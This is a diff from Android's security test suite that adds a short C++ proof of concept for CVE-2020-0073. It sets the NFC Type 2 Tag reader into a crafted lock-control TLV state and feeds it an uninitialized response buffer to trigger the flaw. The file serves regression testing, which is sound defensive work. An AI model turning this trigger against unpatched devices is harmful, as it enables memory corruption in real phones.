1 files changed, 43 insertions, 0 deletions

diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
new file mode 100644
index 00000000000..d6ea4462558
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0073/poc.cpp
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "../includes/common.h"
+#include <nfc_api.h>
+#include <rw_int.h>
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void rw_t2t_handle_rsp(uint8_t* p_data);
+void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) {
+    (void)event;
+    (void)p_rw_data;
+}
+
+int main() {
+    tRW_T2T_CB* p_t2t = &rw_cb.tcb.t2t;
+    rw_init();
+    rw_cb.p_cback = &poc_cback;
+    p_t2t->state = RW_T2T_STATE_DETECT_TLV;
+    p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV;
+    p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE;
+    p_t2t->found_tlv = TAG_LOCK_CTRL_TLV;
+    p_t2t->bytes_count = 1;
+    p_t2t->num_lockbytes = RW_T2T_MAX_LOCK_BYTES;
+    uint8_t data[T2T_READ_DATA_LEN];
+    rw_t2t_handle_rsp(data);
+    return EXIT_SUCCESS;
+}